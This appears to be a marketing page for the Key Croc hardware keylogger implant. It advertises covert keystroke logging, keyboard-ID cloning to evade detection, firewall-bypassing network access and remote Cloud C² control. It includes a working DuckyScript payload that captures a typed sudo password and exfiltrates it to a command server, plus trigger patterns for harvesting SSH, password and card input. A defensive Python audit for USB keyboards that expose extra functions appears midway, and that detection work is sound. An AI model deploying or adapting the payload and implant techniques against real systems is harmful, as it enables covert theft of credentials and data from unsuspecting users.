🐊

Key Croc

Smart Keylogger & Pentest Implant

A keylogger armed with pentest tools, remote access, and payloads that trigger multi-vector attacks when chosen keywords are typed. The ultimate covert implant.

KEYWORD TRIGGERED · WIFI ENABLED · DUCKYSCRIPT 2.0 · CLOUD C² · LINUX · STEALTH MODE

More Than a Keylogger

The Key Croc sits invisibly between a keyboard and a target computer. Out of the box it records every keystroke — but that's just the beginning. It watches for keywords and patterns in real time, triggering payloads the moment something interesting is typed. A user types "sudo"? Capture the password that follows. Someone enters their email credentials? Exfiltrate them to Cloud C² instantly. It clones the connected keyboard's hardware identifiers, making it undetectable to the host system.

Stealth Rating 92 / 100
✓ LED off during operation
✓ Clones keyboard VID/PID
✓ Passthrough — zero typing lag
✓ Protected arming mode

Implant → Intercept → Trigger → Exfiltrate

01 Implant: Plug between keyboard and target — boots in seconds
02 Intercept: Passthrough keystrokes while silently logging everything
03 Trigger: MATCH keyword patterns fire attack payloads
04 Exfiltrate: Loot sent via WiFi to Cloud C² — anywhere in the world

Keyword-Triggered Payloads

The MATCH system watches keystrokes in real time. When a pattern or keyword is detected, the assigned payload fires automatically. Supports strings, single keys, and full regex.

MATCH sudo
Capture sudo password — SAVEKEYS captures everything typed after "sudo" until Enter is pressed, then exfiltrates the password.
MATCH password
Credential harvest — Triggers SAVEKEYS NEXT to log the following keystrokes, capturing whatever is typed into the password field.
MATCH ssh root@
SSH session capture — Logs the target host and subsequent authentication, revealing infrastructure and credentials.
MATCH [REGEX]
Regex patterns — Match credit card formats, email addresses, API keys, or any custom pattern using full regular expressions.
MATCH [CAPS_LOCK]
Single key triggers — Fire payloads on specific key events. Useful for detecting when a user locks their workstation.
MATCH vpn connect
VPN detection — Detect when a user connects to VPN and trigger network reconnaissance while the tunnel is active.

Specifications

Processor: Quad-core 1.2 GHz ARM CPU
Storage: 8 GB desktop-class SSD
WiFi: Integrated 2.4 GHz antenna; SSH & Cloud C² access
Interface: USB 2.0 passthrough; 74 × 27 × 14 mm
Controls: Hidden arming button; RGB LED (off during stealth)
Operating System: Debian Linux — root access; nmap, Responder, Impacket, Metasploit
Power: 5W (USB 5V 1A); powered by host
Operating Temp: 35°C – 45°C; 0% – 90% humidity

Key Features

▸ Smart Keylogging — SAVEKEYS with LAST, NEXT, and UNTIL parameters. Capture N keys before/after a trigger, or record until a regex match fires.
▸ Detection Evasion — Automatically clones the VID, PID, serial number, and manufacturer string of the attached keyboard. Completely invisible to the host.
▸ Keystroke Injection — DuckyScript 2.0 injects keystrokes into the target. Combine logging with active exploitation in a single payload.
▸ Network Hijacking — Emulate USB Ethernet (RNDIS/ECM) to get direct network access to the target, bypassing IDS and perimeter firewalls.
▸ Cloud C² — Remote access from anywhere via browser. Watch keystrokes in real time, inject keystrokes live, manage payloads, exfiltrate loot, and get a root shell.
▸ Protected Arming Mode — Password-protect the arming button to prevent Blue Teamers from accessing the device's configuration during deployments.
▸ Multi-Vector Attack Modes — Simultaneously emulate HID, Ethernet, Storage, and Serial. Combine vectors for complex automated attack chains.
▸ Environment Variables — GET_VARS exports $TARGET_IP, $TARGET_HOSTNAME, $HOST_IP, $VID, $PID and more for context-aware payload scripting.
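
Defender's view of the cloning and multi-vector features above, as an added example that is not Hak5 code: because the VID/PID is copied from the real keyboard, a VID/PID allowlist still passes, so this audit looks at the USB interface classes a keyboard enumerates instead. The inventory, port names and IDs are constructed sample data, and the check only fires when a keyboard also exposes Ethernet, storage or serial functions.

```python
"""Flag USB keyboards that also enumerate network, storage or serial functions."""

HID, CDC_COMM, MASS_STORAGE = 0x03, 0x02, 0x08
# (class, subclass, protocol) triples commonly used by RNDIS gadgets
RNDIS_TRIPLES = {(0xE0, 0x01, 0x03), (0xEF, 0x04, 0x01), (CDC_COMM, 0x02, 0xFF)}

def classify(cls, sub, proto):
    """Map one interface descriptor triple to a coarse function name."""
    if (cls, sub, proto) == (HID, 0x01, 0x01):   # HID boot-protocol keyboard
        return "keyboard"
    if (cls, sub, proto) in RNDIS_TRIPLES:       # must precede the ACM test
        return "ethernet-rndis"
    if (cls, sub) == (CDC_COMM, 0x06):           # CDC Ethernet Control Model
        return "ethernet-ecm"
    if (cls, sub) == (CDC_COMM, 0x02):           # CDC Abstract Control Model
        return "serial-acm"
    if cls == MASS_STORAGE:
        return "storage"
    return None                                  # extra HID, CDC data, etc.

def audit(devices, allowlist):
    """Return keyboards that expose non-keyboard functions, allowlisted or not."""
    findings = []
    for dev in devices:
        funcs = {classify(*iface) for iface in dev["interfaces"]} - {None}
        extra = sorted(funcs - {"keyboard"})
        if "keyboard" in funcs and extra:
            findings.append({
                "port": dev["port"],
                "allowlisted": (dev["vid"], dev["pid"]) in allowlist,
                "extra": extra,
            })
    return findings

# Constructed inventory. On Linux the same fields can be read from sysfs:
# idVendor/idProduct per device, bInterfaceClass/SubClass/Protocol per interface.
SAMPLE = [
    {"port": "1-2", "vid": 0x1234, "pid": 0xABCD,   # plain keyboard + media keys
     "interfaces": [(0x03, 0x01, 0x01), (0x03, 0x00, 0x00)]},
    {"port": "1-4", "vid": 0x1234, "pid": 0xABCD,   # same IDs, plus CDC ECM
     "interfaces": [(0x03, 0x01, 0x01), (0x02, 0x06, 0x00), (0x0A, 0x00, 0x00)]},
    {"port": "1-5", "vid": 0x5678, "pid": 0x0001,   # ordinary flash drive
     "interfaces": [(0x08, 0x06, 0x50)]},
]
ALLOWLIST = {(0x1234, 0xABCD)}

if __name__ == "__main__":
    for finding in audit(SAMPLE, ALLOWLIST):
        print(finding)
```

A finding with "allowlisted": True is the case to investigate first: the identifiers match an approved keyboard, but the device on that port is doing more than a keyboard does.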

Sudo Password Capture & Exfiltration

This payload silently captures the sudo password when the target types "sudo", then exfiltrates it to Cloud C² for remote retrieval.

# Capture sudo password and exfiltrate via Cloud C²

MATCH sudo

# Save keystrokes until Enter is pressed twice
SAVEKEYS /root/loot/sudo-pass.txt UNTIL \[ENTER\](.*?)\[ENTER\]

# Wait for the loot file to be written
WAIT_FOR_LOOT /root/loot/sudo-pass.txt

# Exfiltrate to Cloud C² with label
C2EXFIL STRING /root/loot/sudo-pass.txt.filtered PASSWD C2

Deployment Scenarios

Credential Harvesting
Capture passwords, API keys, SSH keys, and any credentials as they're typed. MATCH patterns ensure nothing is missed.

Long-Term Implant
Deploy during physical access, then monitor remotely via Cloud C² for weeks. Protected arming mode prevents discovery.

Corporate Red Team
Plant during social engineering engagements. Capture credentials, map internal networks via Ethernet mode, exfiltrate documents.

Insider Threat Simulation
Demonstrate the risk of unmonitored USB ports. Show stakeholders how easily a hardware implant intercepts sensitive data.

IT Automation
Trigger administrative scripts when specific commands are typed. Automate repetitive workflows with keyword-driven macros.

Security Awareness
Demonstrate keylogger risks in training environments. Show why USB port security and endpoint monitoring matter.